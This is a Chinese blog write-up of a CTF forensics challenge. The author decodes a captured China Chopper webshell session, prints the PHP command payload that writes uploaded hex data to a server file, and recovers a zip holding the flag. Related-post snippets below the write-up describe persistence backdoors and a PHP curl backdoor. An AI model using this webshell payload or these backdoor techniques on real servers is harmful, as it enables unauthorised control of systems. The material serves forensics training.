【WEB】BackDoor

最新推荐文章于 2023-03-15 10:45:06 发布
最新推荐文章于 2023-03-15 10:45:06 发布
阅读量1.3k 收藏
点赞数
分类专栏: CTF

下载数据包,发现有菜刀连接的痕迹。 
怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。

右键,追踪tcp流,发现两个加密后的字符串 

这里写图片描述 

对字符串进行base64解密,发现菜刀的特征字符: 
这里写图片描述 
解密后是这么一段特征字符: 

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\uploads\\reverseshell.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();

怎么判断是菜刀?知识补充:

  1. 先用@ini_set(“display_errors”,”0”);临时关闭PHP的错误显示功能

  2. @set_time_limit(0);防止像dir、上传文件大马时超时

  3. @set_magic_quotes_runtime(0);关闭魔术引号,这东西在4.0以后就不怎么用了

  4. echo(“->|”);没啥好说的

  5. print(“hello PHP!”);输出字符串

  6. die();人如其名 
    其他的指令也是同一个道理了。

好了,我们继续,发现是利用菜刀控制服务器,找到加密后的字符: 

 

复制如下: 

504B0304140000000800288DC34C58BD2C542C0500002C0700000E000000313532383031383837352E706E676D956D54926718C7B12C4D33ED45CD94B034E9D4C9B6F2A5D4503B1A5A274CB1B2E341A798D35EA82D4D110173B9AD48C8B9B2A395A5A8684C84694D54B0B65646BA91C0A333C2487C8530ECE909151C7E4BE19CDFFD7CB8CF7D5FE77F5FD7F5BF9E2B47306807BB0D763018CC213A2A220E06B35A3FBF6C9798766CD59401186CF9547444787CEE6D8D3C96FE6ECFCA659D3DA95AAAEACD52F6CAA8412F955F03CA66DF43E550386C0BB652A15020EE0D570E2C2D10865DF7FC9241854A484155BEFD4E7D8B2DD1865E52B1EE1A67C488E3A6CFEF7C63B62B42C4ACB3397DA01016BE80826C3D69EC8E74A44B790E0B12E71834460DAAA09A94BDAE45A1F79AFDDA2BFCB26778C1177486EB49F582C84709FFB2013AF4A019744C64DF105E28FB081AF702D4CBA1E9DE3F3B79DB7E09EBA65031C67AF19A8B20F2BCE512728D406AC8C3517E715BB1C47A21C6747D5B3D1485436BB5D1C06903E7A499DA79C1E341AFC01BC5CAEDB0987297FC727AAD667D58EFF8B16755BD20E22DC36DC5E6454157BD5050B31FE5A3F1F0A5B9D3EFAA00A36D779493E74226897FF6F45FED7210A3CBE4817B0BE8FBE4871D6684347385C3E5A3819A0139878BD9F8208F999071F7B593A187E4FF5B98074E76CDDAAA7021525D4E07A18F3B95A363F54EB400B58EC1C422EECD51508422EF4C5F982413197BA7752C425FEC34BB8C490BE671722288711E09860A78A286E5D8F9FEDC2D1F33DD5F411B220D4C71570F6A06CA1BD9EE5E7A07AC40A9D35CEF07ED5E636DBB90663F71657E7155639F7A384FC4F42AC54D069F5295C624BA6E5A1CB8C9971AE3125D7635F1090D08E19F3124C1C7491A48EA1A40F74D6C2FF1DD3F99B4E89D366D42DA3E35C38E078FD4545BA919E379C9FA6AA516ECF8548AB868A1CE28B87424AF98572F49F2E864A6DECFFF1E82C4EB7D84FD7452266549B1B5D979192776DD71F7719A33DCDEFE703781DE782299B3B5BC1D48739C9978699694264AB17270CEF1624D6B92CF1BE83F253864BF0BDF62ACF599469B1F3E7FFE4735B8DCEFA9306403157BA18AFC1439F93105098181E00411699E448FDB9B667A367E02D02DD426B5D879DCA083E63EB7D975CF01F1BF86A69A9BEB876164A9212CE8FDD1D0632D99100496E7F6B636E283479103C21093B70A16798B3F2B8FDDDCFE2660DAC1F92DD74AE20FBA55CEA623735A2A4A3C17B97DDEF046371EBCAE3CA0E30057D21C72D44FFFEAA0BC2F351D61AE3ABE6274A7545452BA654C799271F01160DF7D088E76F1C0A5E8EA6A684EED65161C9E193C0556631427EA1A2BCE5C6E8E6F3F4EE690D79A47668B14A5D211BA08F3FE3961DBF300693D64D344E500379990146DEEDEF959C3F636A4093F0F64C94E61C1563C2E8527D60FA13E18ACDA2F99F78989866F9F63F8145606F931132F9DB853DD909CA2CB559263A05D96B28763BB07C03FF66749329F3D7000FF0E021847C99A354F045D96065FABEF7EB420437BA14322E08C71F3C54087242BE4C96A8B4527E13ECCF6D69276F867CB76DEDD7104D1C9CCA18F5F31572C53696BBA5EE0B94654FF2CD334CAB01F72E61ECB62C49A3D9C8794223A72127FA0D076718FE8A038ACB66415B8ED6CEF4F9A0CA1E96A1A6FAB826974BE65A9ECF7F8F42C1C79D9601B5F7AA63C24E153C62582EEA552E9BED642774F822A2DF9305985FCE7FAD96DD181FE32E28868F521708B93851E1129929B0FF1EBB93D436BFFA05C256011350691E021BEC4FC91A6890A044EB9F86B8C465FB8CD3046F697A215303EBB66BD7AD15CA80C3DF2AAC88243E7952176AF6B886B2408969BFE82B0E8484C44E3FE6F0AFF07504B01021400140000000800288DC34C58BD2C542C0500002C0700000E0000000000000000002000000000000000313532383031383837352E706E67504B050600000000010001003C000000580500000000

发现是十六进制的,使用notepade++进行转换:  

这里写图片描述 

选择插件》16进制转assci 
这里写图片描述
最后转化为一段乱码: 
这里写图片描述
将他另存为zip: 
这里写图片描述 
打开,扫面二维码就拿到flag!

 

 

 

pcy190
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
权限维持:常用后门
f_carey的博客
12-18 1224
权限维持:常用后门1 粘滞键后门1.1 粘滞键1.1.1 设置粘滞键后门1.2 配置开启远程桌面连接1.3 详细建议阅读此处文章2 注册表后门2.1 用注册表添加 nc 后门(metepreter)3 计划任务后门3.1 PowerSploit 中计划任务后门4 WMI 型后门4.1 防御 WMI 型后门5 WEB 后门5.1 weevely5.2 webacoo 后门 配合 Windows 提权文章 1 粘滞键后门 1.1 粘滞键 windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键
ASP.NET Web BackDoor v1.0.rar
07-09
功能: 文件管理模块: 文件浏览/下载/删除/编辑/复制/移动/新建/上传; 目录新建/移动/删除/复制; 数据库管理模板: ...ACCESS数据库建立/压缩/操作;...以及常见数据库(MSSQL,MYSQL,DSN)的操作,附有操作示例...
backdoor:后门调试的微型工具
07-13
后门 Backdoor.js 是一个简单而有用的的微型助手。 在某个函数作用域中创建一个后门,然后访问该作用域或其父作用域中可用的对象。 $ npm install backdoor 你可以通过 npm 和 require('backdoor') 安装它,或者在你的节点应用程序或网页中使用它之前将 backdoor.js 源代码粘贴到某处。
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 532
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
后门查杀1
wrypot的博客
03-15 292
下载下来是这样的,我们先用火绒查杀一下,打开火绒->病毒查杀->自定义查杀选中要查杀的文件夹。点击详情->查看文件路径->打开include.php。密码就是flag,所以搜pass。
使用 backdoor 工具注入ShellCode
CSDN
08-12 5357
backdoor-factory 顾名思义,直接翻译过来就是后门工厂的意思。其利用打补丁的方式编码加密PE文件,可以轻松的生成win32PE后门程序,从而帮助我们绕过一些防病毒软件的查杀,达到一定得免杀效果,利用该工具,攻击者可以在不破坏原有可执行文件的功能的前提下,在文件的代码裂隙中插入恶意代码Shellcode。当可执行文件被执行后,就可以触发恶意代码。Backdoor Factory不仅提供常用的脚本,还允许嵌入其他工具生成的Shellcode,如Metasploit。
ASP.NET Web BackDoor 1.0_aspxbackdoor.zip
12-22
ASP.NET Web BackDoor 1.0_aspxbackdoor.zip
ASP.NET源码——ASP.NET Web BackDoor.zip
10-10
ASP.NET源码——ASP.NET Web BackDoor.zip
[其他类别]ASP.NET Web BackDoor 1.0_aspxbackdoor.zip源码ASP.NET网站源码打包下载
05-19
[其他类别]ASP.NET Web BackDoor 1.0_aspxbackdoor.zip源码ASP.NET网站源码打包下载[其他类别]ASP.NET Web BackDoor 1.0_aspxbackdoor.zip源码ASP.NET网站源码打包下载[其他类别]ASP.NET Web BackDoor 1.0_...
backdoorphp.webshell.ad后门病毒怎么办?
小戴站长_一个关于互联网知识的博客
03-29 4263
近日在备份数据的时候,杀毒软件火绒突然爆此文件有病毒backdoorphp.webshell.ad后门病毒,病毒信息为当时在想,又没有做什么怎么会有病毒?后来发现,原来是数据库被写入病毒导致的。只能去搜索哪个表被写入病毒。挨个去查找,只不过需要费点时间罢了。 ...
PHP后门:PHP后门的集合。 仅用于教育或测试目的
02-05
PHP后门 PHP后门的集合。 仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与您的网络分开并在虚拟机中! 某些后门可能是后门的(是的,确实) 。 永远不要将其用于任何恶意目的。 后门遵循以下格式: Backdoorname_SHA1.php ,后门的名称是已知的。 PHP工具 这包括指向以下工具的链接: 反混淆器(在线和离线) 美化工具(在线和离线) 测试人员(运行代码-在安全的环境中执行此操作!) 直接从访问这些工具的链接。 其他回购 这是一个
php_backdoor.php
06-11
大马文件
php下批量挂马和批量清马代码
10-28
批量挂马和批量清马程序PHP版,所以黑客工具的对立性,在黑客手里是破坏工具,在维护的站长来说是修正工具。
php backdoor
11-28
php backdoor, very good to use
2021年工业信息安全技能大赛CTF-03-msbackdoor的附件.zip
08-03
2021年工业信息安全技能大赛CTF-03
2021数学建模美赛C题代码.zip
04-24
最全的数学建模美赛C题和代码、大量刷题题库、逻辑清晰易于学习
这是一个保存Springboot+MyBaits项目的仓库.zip
最新发布
04-24
springboot框架 一、Spring Boot基础应用 Spring Boot特征 概念: 约定优于配置,简单来说就是你所期待的配置与约定的配置一致,那么就可以不做任何配置,约定不符合期待时才需要对约定进行替换配置。 特征: 1. SpringBoot Starter:他将常用的依赖分组进行了整合,将其合并到一个依赖中,这样就可以一次性添加到项目的Maven或Gradle构建中。 2,使编码变得简单,SpringBoot采用 JavaConfig的方式对Spring进行配置,并且提供了大量的注解,极大的提高了工作效率,比如@Configuration和@bean注解结合,基于@Configuration完成类扫描,基于@bean注解把返回值注入IOC容器。 3.自动配置:SpringBoot的自动配置特性利用了Spring对条件化配置的支持,合理地推测应用所需的bean并自动化配置他们。 4.使部署变得简单,SpringBoot内置了三种Servlet容器,Tomcat,Jetty,undertow.我们只需要一个Java的运行环境就可以跑SpringBoot的项目了
课设&大作业-毕业设计精品课程网站,采用的技术是 SSM 框架和 Shiro.zip
04-24
【资源说明】【毕业设计】 1、该资源内项目代码都是经过测试运行成功,功能正常的情况下才上传的,请放心下载使用。 2、适用人群:主要针对计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、数学、电子信息等)的同学或企业员工下载使用,具有较高的学习借鉴价值。 3、不仅适合小白学习实战练习,也可作为大作业、课程设计、毕设项目、初期项目立项演示等,欢迎下载,互相学习,共同进步!
c#做的综合上位机,服务于freescale智能车&电子设计.zip
04-24
c#做的综合上位机,服务于freescale智能车&电子设计.zip
UVM_BACKDOOR是什么
12-05
根据提供的引用内容,没有直接回答UVM_BACKDOOR是什么的信息。但是,可以根据引用内容提供一些相关信息。 引用中提到了uvm_bitstream_t,这是UVM中的一种数据类型,用于在UVM组件之间传递数据。而UVM_BACKDOOR是UVM...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值